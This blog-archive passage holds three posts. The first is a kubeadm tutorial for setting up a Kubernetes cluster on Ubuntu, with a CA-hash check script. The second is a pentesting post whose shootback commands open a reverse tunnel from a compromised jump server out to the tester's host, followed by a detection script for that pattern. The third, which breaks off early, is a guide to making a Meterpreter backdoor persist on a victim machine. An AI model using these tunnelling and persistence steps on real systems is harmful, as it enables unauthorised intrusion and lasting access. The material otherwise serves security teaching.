<b>Setting up Kubernetes v1.16.3 in Ubuntu 18.04 using kubeadm</b> (Subhash Dasyam's blog, 2019-12-05)<br />
This tutorial shows how to set up your own Kubernetes cluster (v1.16.3, or the latest release) on Ubuntu 18.04.<br />
<br />
<br />
Here I am installing the Kubernetes cluster on three servers: one master and two worker nodes.<br />
<br />
<span style="color: #0b5394; font-size: x-large;"><b>On all 3 servers</b></span><br />
<br />
First, set up the Docker and Kubernetes repositories:<br />
<br />
<br />
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key add -
cat << EOF | sudo tee /etc/apt/sources.list.d/kubernetes.list
deb https://apt.kubernetes.io/ kubernetes-xenial main
EOF</code></pre>
<br />
<br />
Install Docker and Kubernetes packages:<br />
<br />
Note that if you want a different Kubernetes version, change the version pinned for kubelet, kubeadm, and kubectl; all three must use the same version.<br />
<br />
<br />
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">sudo apt-get update
# apt needs the full docker-ce package version string; take the newest 18.09 build listed by "apt-cache madison docker-ce"
DOCKER_VER=$(apt-cache madison docker-ce | awk '/18\.09/ {print $3; exit}')
sudo apt-get install -y docker-ce="$DOCKER_VER" kubelet=1.16.3-00 kubeadm=1.16.3-00 kubectl=1.16.3-00
# hold the packages so an unattended upgrade cannot move the cluster to another release
sudo apt-mark hold docker-ce kubelet kubeadm kubectl</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Enable bridged traffic to traverse iptables (kube-proxy and most pod network plugins rely on it):</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">sudo modprobe br_netfilter   # the sysctl key below only exists once this module is loaded
echo "net.bridge.bridge-nf-call-iptables=1" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p
sudo swapoff -a              # kubeadm's preflight checks fail while swap is enabled</code></pre>
<h4 style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #29485b; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1em; margin: 25px 0px;">
On the Kube master server</h4>
<br />
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Initialize the cluster:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;"># the last lines of the output are the "kubeadm join ..." command the nodes need; keep them
sudo kubeadm init --pod-network-cidr=10.244.0.0/16</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Set up local kubeconfig:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">mkdir -p $HOME/.kube
sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown $(id -u):$(id -g) $HOME/.kube/config</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
<br /></div>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
<span style="-webkit-font-smoothing: antialiased; box-sizing: border-box; font-weight: 600;">Note:</span> Install the flannel pod network. With Kubernetes 1.16 or later, use this newer flannel installation YAML rather than the one older guides reference:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/3f7d3e6c24f641e7ff557ebcea1136fdf4b1b6a1/Documentation/kube-flannel.yml</code></pre>
<h4 style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #29485b; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1em; margin: 25px 0px;">
On each Kube node server</h4>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Join the node to the cluster:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;"># the three values come from the "kubeadm join" line printed by kubeadm init (a fresh one: kubeadm token create --print-join-command)
sudo kubeadm join $controller_private_ip:6443 --token $token --discovery-token-ca-cert-hash $hash</code></pre>
<h4 style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #29485b; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1em; margin: 25px 0px;">
On the Kube master server</h4>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Verify that all nodes are joined and ready:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">kubectl get nodes</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
You should see all three servers with a status of Ready:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">NAME STATUS ROLES AGE VERSION
ip-192-168-2-101 Ready master 54m v1.16.3
ip-192-168-2-102 Ready <none> 49m v1.16.3
ip-192-168-2-103 Ready <none> 49m v1.16.3</code></pre>
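The <code>--discovery-token-ca-cert-hash</code> in the join command is what stops a node from trusting an impostor control plane: kubeadm defines it as SHA-256 over the DER-encoded SubjectPublicKeyInfo of the cluster CA. As an added example (not part of this tutorial), the following pure-Python check recomputes that hash from a CA certificate and compares it with a join command; the certificate it runs on is a constructed, unsigned stand-in for /etc/kubernetes/pki/ca.crt, and the DER walker is written here rather than taken from kubeadm.

```python
"""Verify a kubeadm join command's --discovery-token-ca-cert-hash against the cluster CA.

kubeadm's value is "sha256:" + SHA-256 of the DER-encoded SubjectPublicKeyInfo of the CA
certificate (/etc/kubernetes/pki/ca.crt on the master). The DER walker and the throwaway
certificate builder below are written for this example; they are not kubeadm code.
"""
import base64
import hashlib
import re


def _read_tlv(buf, pos):
    """Return (tag, value_start, value_end) for the DER element starting at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                               # long form: low bits = number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length


def _children(buf, start, end):
    """Yield (tag, raw_element_bytes) for each element directly inside buf[start:end]."""
    pos = start
    while pos < end:
        tag, _, vend = _read_tlv(buf, pos)
        yield tag, buf[pos:vend]
        pos = vend


def spki_from_cert_der(cert):
    """Extract the raw SubjectPublicKeyInfo element from a DER-encoded X.509 certificate."""
    _, tbs_pos, _ = _read_tlv(cert, 0)              # Certificate ::= SEQUENCE { tbsCertificate, ... }
    _, start, end = _read_tlv(cert, tbs_pos)        # tbsCertificate ::= SEQUENCE { ... }
    elems = list(_children(cert, start, end))
    if elems[0][0] == 0xA0:                         # optional EXPLICIT [0] version comes first
        elems = elems[1:]
    # remaining order: serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo
    return elems[5][1]


def pem_to_der(pem):
    return base64.b64decode(re.sub(r"-----[A-Z ]+-----|\s", "", pem))


def ca_cert_hash(cert_der):
    return "sha256:" + hashlib.sha256(spki_from_cert_der(cert_der)).hexdigest()


def join_hash_matches(join_cmd, cert_der):
    """True only if the join command pins exactly the CA whose certificate is given."""
    m = re.search(r"--discovery-token-ca-cert-hash\s+(sha256:[0-9a-f]{64})", join_cmd)
    return bool(m) and m.group(1) == ca_cert_hash(cert_der)


# --- constructed sample certificate: structurally valid, unsigned, for this example only ---
def _der(tag, content):
    n = len(content)
    length = bytes([n]) if n < 0x80 else (bytes([0x81, n]) if n < 0x100 else bytes([0x82, n >> 8, n & 0xFF]))
    return bytes([tag]) + length + content


_RSA_SHA256 = _der(0x30, _der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b"))   # sha256WithRSAEncryption


def build_sample_cert(spki, with_version=True):
    fields = [_der(0xA0, _der(0x02, b"\x02"))] if with_version else []          # [0] EXPLICIT version v3
    fields += [_der(0x02, b"\x01"), _RSA_SHA256, _der(0x30, b""),               # serial, sigalg, issuer
               _der(0x30, _der(0x17, b"191205000000Z") + _der(0x17, b"291205000000Z")),  # validity
               _der(0x30, b""), spki]                                           # subject, SPKI
    tbs = _der(0x30, b"".join(fields))
    return _der(0x30, tbs + _RSA_SHA256 + _der(0x03, b"\x00" + b"\xaa" * 32))   # dummy signature


SAMPLE_SPKI = _der(0x30, _der(0x30, _der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01") + _der(0x05, b""))
                   + _der(0x03, b"\x00" + b"\x42" * 270))                       # fake 270-byte key bit string
SAMPLE_CERT_DER = build_sample_cert(SAMPLE_SPKI)
SAMPLE_CA_PEM = "-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(SAMPLE_CERT_DER).decode() + "-----END CERTIFICATE-----\n"
SAMPLE_JOIN = ("sudo kubeadm join 192.168.2.101:6443 --token abcdef.0123456789abcdef "     # token is made up
               "--discovery-token-ca-cert-hash " + ca_cert_hash(SAMPLE_CERT_DER))

if __name__ == "__main__":
    print(ca_cert_hash(pem_to_der(SAMPLE_CA_PEM)))
    print("join command pins this CA:", join_hash_matches(SAMPLE_JOIN, pem_to_der(SAMPLE_CERT_DER)))
```

On a real master, <code>pem_to_der(open("/etc/kubernetes/pki/ca.crt").read())</code> gives the bytes to pass in, and the result should equal the hash kubeadm printed.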
<hr /><b>Pentesting servers behind NAT | Reverse RDP Windows | Reverse SSH</b> (2019-12-05)<br />
Good day viewers,<br />
<br />
Today I bring another interesting scenario: pentesting servers that sit behind NAT, or reverse RDP/SSH on Windows. In layman's terms, connecting to Windows, Linux or other servers behind NAT over RDP, SSH, or raw TCP/UDP.<br />
<br />
In r/explainlikeimfive words:<br />
<br />
Imagine you are auditing or pentesting a server and you find an RCE on it, but unfortunately the server is just a bastion / jump server: the application servers behind it sit on a private network and are not exposed to the public network. You need a way to audit those application servers listening on the private network, or you want to connect to them via SSH / RDP / TCP / UDP. How do we achieve that? Yes, I know there are a number of ways to do this, so let me explain one that I found easy.<br />
<br />
I tried many different netcat scenarios, routing ports internally, connecting via socat, etc., without any luck.<br />
I tried to do a reverse SSH tunnel using plink, but there we have to expose our SSH username and password on the target PC, which I would never recommend in pentesting if you want to be discreet.<br />
<br />
Finally, I found what I was looking for, "a reverse TCP tunnel which lets you access a target behind NAT or firewall": <a href="https://github.com/aploium/shootback" rel="nofollow" target="_blank">shootback</a><br />
<br />
It works in a fairly simple way: when you cannot connect directly to the private network, it lets the private network connect back to you through the jump server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVfABsmB_GSrnP4Jww8BCgeWJRTkSHPJbNsGhG2uXd52SHFBjbWdpzteZVt7dMoG-zAggQw-JXoo6SCcrUmmawyiuTp9zbMGDLJt11FRvymRXQDwELq0_TVjzokqWX5h2-HMY6sl1i8XpJ/s1600/graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="694" data-original-width="898" height="494" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVfABsmB_GSrnP4Jww8BCgeWJRTkSHPJbNsGhG2uXd52SHFBjbWdpzteZVt7dMoG-zAggQw-JXoo6SCcrUmmawyiuTp9zbMGDLJt11FRvymRXQDwELq0_TVjzokqWX5h2-HMY6sl1i8XpJ/s640/graph.png" width="640" /></a></div>
<br />
<br />
<b><span style="font-size: large;"><u>Your Machine</u></span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbJiJv9ly03C-N35TZFAygVriYMgJarT-2LQV-nG_jPFTh2wT8y4n8mLiZUheHPo2vzuCrpluqzq0O3WtQbNN_BQFbBOeb8CGPQ84_65aAXWrcpKj7ZquvpneVd_JFgOW3QJlpIyr95X2/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="71" data-original-width="938" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbJiJv9ly03C-N35TZFAygVriYMgJarT-2LQV-nG_jPFTh2wT8y4n8mLiZUheHPo2vzuCrpluqzq0O3WtQbNN_BQFbBOeb8CGPQ84_65aAXWrcpKj7ZquvpneVd_JFgOW3QJlpIyr95X2/s1600/1.png" /></a></div>
<br />
<b><u>Syntax</u></b><br />
<br />
<b>python3 master.py -m</b> <span style="background-color: #cccccc;">&lt;YOUR_IP_ADDRESS&gt;</span><b style="background-color: yellow;">:</b><span style="background-color: #cccccc;">&lt;YOUR_LISTEN_PORT&gt;</span> <b>-c</b> <span style="background-color: #999999;">&lt;YOUR_IP_ADDRESS&gt;</span><b style="background-color: yellow;">:</b><span style="background-color: #999999;">&lt;REDIRECTED_PORT&gt;</span><br />
<br />
<b><u>Example</u></b><br />
<div style="text-align: center;">
<blockquote class="tr_bq">
<b>python3 master.py -m 0.0.0.0:9999 -c 0.0.0.0:7676</b></blockquote>
</div>
<br />
<br />
<span style="font-size: large;"><b><u>On JumpServer / Target Machine</u></b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYrQS07SdjhuWAxglAf3cLTTcdN2kuDnj-CTgR_Q_CugkVUL6ZIkgZKg6MJZ-HydhWX8APINAKuQVX1DmN21MNQYMq1KisjyhPFKlzzIs75L9CT3DIQcv5Hhb_hTW2ALy4SVmPTNyihDXV/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="19" data-original-width="489" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYrQS07SdjhuWAxglAf3cLTTcdN2kuDnj-CTgR_Q_CugkVUL6ZIkgZKg6MJZ-HydhWX8APINAKuQVX1DmN21MNQYMq1KisjyhPFKlzzIs75L9CT3DIQcv5Hhb_hTW2ALy4SVmPTNyihDXV/s1600/2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><u>Syntax</u></b></div>
<br />
<b>python.exe slaver.py -m </b><span style="background-color: #999999;">&lt;YOUR_PUBLIC_IP or DYNAMIC_DNS&gt;</span><b>:</b><span style="background-color: #999999;">&lt;YOUR_LISTEN_PORT&gt;</span> <b>-t </b><span style="background-color: #cccccc;">&lt;TARGET_APPLICATION_IP_ADDRESS&gt;</span><b>:</b><span style="background-color: #cccccc;">&lt;TARGET_APPLICATION_PORT&gt;</span><br />
<br />
<b><u>Example</u></b><br />
<div style="text-align: center;">
<blockquote class="tr_bq">
<b>python.exe slaver.py -m thisisexample.dyndns.com:9999 -t 10.30.11.54:3389</b></blockquote>
</div>
<br />
<br />
Once you run the above command, you will see the connection being established to your listening machine:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHrKyHmgup4H15U5xznrKqfbnLKESusnK3V0zLVj1UaoCoJ1xrXHPOWWvRu4BGKEQ1R0Wp-j-NXGkVUaQfxY_9mWsInB5ww9ncsl7IwS6M01wn-XB-Yu0M0FSVW7EAtshznA2ycQq8ESc-/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="103" data-original-width="688" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHrKyHmgup4H15U5xznrKqfbnLKESusnK3V0zLVj1UaoCoJ1xrXHPOWWvRu4BGKEQ1R0Wp-j-NXGkVUaQfxY_9mWsInB5ww9ncsl7IwS6M01wn-XB-Yu0M0FSVW7EAtshznA2ycQq8ESc-/s1600/3.png" /></a></div>
<br />
Now that the connection is being forwarded to port 7676, we should be able to connect to our local IP address on port 7676:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-RZKpfRlzUSbu7Q2PT2BmavKxdhgTl1K4qc1XoDx1n3yKenVFQqosK-SiBp2hGVZciYX-n_UYAGRq-184ZNVxEJI09uc1IkEptZy9T0bDucDX0nM3G0thn_W77WgQjLL66yRL3OcebFX/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="539" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-RZKpfRlzUSbu7Q2PT2BmavKxdhgTl1K4qc1XoDx1n3yKenVFQqosK-SiBp2hGVZciYX-n_UYAGRq-184ZNVxEJI09uc1IkEptZy9T0bDucDX0nM3G0thn_W77WgQjLL66yRL3OcebFX/s640/4.png" width="640" /></a></div>
<br />
<br />
<br />
Voila! Here it is: I am connected to the private network behind a load balancer / NAT via the jump server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDUUCRQF79mqnV8NBIDYTL2jFcxMd8gah3xDmmH4YgFU4Jk_9tLzR2tTEgmaOSkHNm3rGNqu55E1F23LKc1mowFUTh7S9plDLatl-RpsqnUtujMGOnr3ukA8ZmRJ2xIYUIWD4_uiTCk_ep/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="564" data-original-width="1600" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDUUCRQF79mqnV8NBIDYTL2jFcxMd8gah3xDmmH4YgFU4Jk_9tLzR2tTEgmaOSkHNm3rGNqu55E1F23LKc1mowFUTh7S9plDLatl-RpsqnUtujMGOnr3ukA8ZmRJ2xIYUIWD4_uiTCk_ep/s400/5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Tip</b>: <i>If the target system doesn't have Python, you can always upload a portable Python zip file and extract it; use your creativity.</i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Disclaimer: This is strictly for educational purposes only, please use this responsibly. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Cheers. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
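From the defender's side, the tunnel described above leaves a recognisable footprint on the jump server: an established outbound connection to the tester's public address on the master port (9999 in this post) held open next to the host's own sessions into the private network (10.30.11.54:3389 here). The following added example, not part of this post or of shootback, checks a constructed <code>ss -tn</code> listing for that pattern; apart from those two values, every address and port in it is made up.

```python
"""Spot a reverse tunnel's footprint in a jump host's TCP connection table.

On the jump host the tunnel's slaver side is an outbound connection to the tester's
public address, held open next to the host's own sessions into the private network.
Added example; not part of the original post or of shootback. IPv4 only.
"""
import ipaddress
from collections import namedtuple

Conn = namedtuple("Conn", "state local_ip local_port peer_ip peer_port")

# Constructed `ss -tn` output. 9999 and 10.30.11.54:3389 are the values from the post;
# every other address and port here is made up for the example.
SAMPLE_SS = """\
State     Recv-Q   Send-Q   Local Address:Port     Peer Address:Port
ESTAB     0        0        10.30.11.5:22          198.51.100.20:55211
ESTAB     0        0        10.30.11.5:51822       203.0.113.7:9999
ESTAB     0        0        10.30.11.5:51830       10.30.11.54:3389
ESTAB     0        0        10.30.11.5:40122       10.30.11.2:443
TIME-WAIT 0        0        10.30.11.5:40118       10.30.11.2:443
"""


def parse_ss(text):
    """Parse the non-header lines of `ss -tn` output into Conn tuples."""
    conns = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 5:
            continue
        lip, lport = parts[3].rsplit(":", 1)
        pip, pport = parts[4].rsplit(":", 1)
        conns.append(Conn(parts[0], lip, int(lport), pip, int(pport)))
    return conns


def _outbound(conns, listening_ports):
    """Established connections this host initiated: their local port is not one it listens on."""
    return [c for c in conns if c.state == "ESTAB" and c.local_port not in listening_ports]


def suspicious_egress(text, listening_ports, egress_allow):
    """Outbound connections whose peer lies outside every allowed egress network."""
    allowed = [ipaddress.ip_network(n) for n in egress_allow]
    return [c for c in _outbound(parse_ss(text), listening_ports)
            if not any(ipaddress.ip_address(c.peer_ip) in net for net in allowed)]


def pivot_pattern(text, listening_ports, egress_allow, admin_ports=(22, 3389)):
    """Pair each unexpected external connection with the internal RDP/SSH sessions open beside it."""
    internal = [c for c in _outbound(parse_ss(text), listening_ports)
                if c.peer_port in admin_ports and ipaddress.ip_address(c.peer_ip).is_private]
    return [(ext, internal) for ext in suspicious_egress(text, listening_ports, egress_allow)]


if __name__ == "__main__":
    for ext, internal in pivot_pattern(SAMPLE_SS, listening_ports={22}, egress_allow=["10.30.11.0/24"]):
        print(f"unexpected egress {ext.peer_ip}:{ext.peer_port} from local port {ext.local_port}")
        for c in internal:
            print(f"  internal admin session alongside it: {c.peer_ip}:{c.peer_port}")
```

The listening-port set and the egress allowlist are the two inputs a bastion owner already has (from <code>ss -tln</code> and the egress firewall policy); anything the check returns is a connection the host initiated to somewhere the policy does not cover.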
<hr /><b>Metasploit Meterpreter Persistence even when you are not listening on the port | Just like a RAT</b> (2019-12-04)<br />
<br />
I came across an interesting dilemma: whether we can use Meterpreter as a proper persistent remote administration tool.<br />
<br />
When I started exploring, I found that we can indeed make the Meterpreter session persistent, i.e., when the PC is disconnected and connected back, it reconnects to your Meterpreter exploit handler.<br />
<br />
Let's see how to do this.<br />
<br />
Assume you have created the Meterpreter payload (ELF or Windows binary) and started your handler on the port of your choice.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTlLdZBt-A9BCjimPmysObXldsXTs7GSVQdTRgkvjfG8yemzFEl2yJRVVfoboLvRLnBVj77X8qkTJqOWQFujQF-oWfzK5klNqj2F_I7zCaa9-fWT62ZbcSsxXccJBLuTH4zCxCYd493WbJ/s1600/msfconsole-readyAndListening.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="305" data-original-width="682" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTlLdZBt-A9BCjimPmysObXldsXTs7GSVQdTRgkvjfG8yemzFEl2yJRVVfoboLvRLnBVj77X8qkTJqOWQFujQF-oWfzK5klNqj2F_I7zCaa9-fWT62ZbcSsxXccJBLuTH4zCxCYd493WbJ/s400/msfconsole-readyAndListening.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Assume we got the connection back after executing the Meterpreter binary:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn4PSJG2HAcRDffg0jpKNFi9HvE3l3P_280MmC3D19UVgCwqXjfvYWYnLcJkTQVZ8LcnOldz5DtFMPbrjkEBGrpl9LrGGxv5rekKueLwiZhxSFd59e41u85x8dqvPW36Pc7CC0YAfDqB8/s1600/msfconsole-sysinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="227" data-original-width="683" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn4PSJG2HAcRDffg0jpKNFi9HvE3l3P_280MmC3D19UVgCwqXjfvYWYnLcJkTQVZ8LcnOldz5DtFMPbrjkEBGrpl9LrGGxv5rekKueLwiZhxSFd59e41u85x8dqvPW36Pc7CC0YAfDqB8/s400/msfconsole-sysinfo.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
At this point we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection is lost until the payload binary is executed again. To avoid this, we use a Ruby Meterpreter script called "persistence", written by Carlos Perez. Showing the help:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/persistence.rb">https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/persistence.rb</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
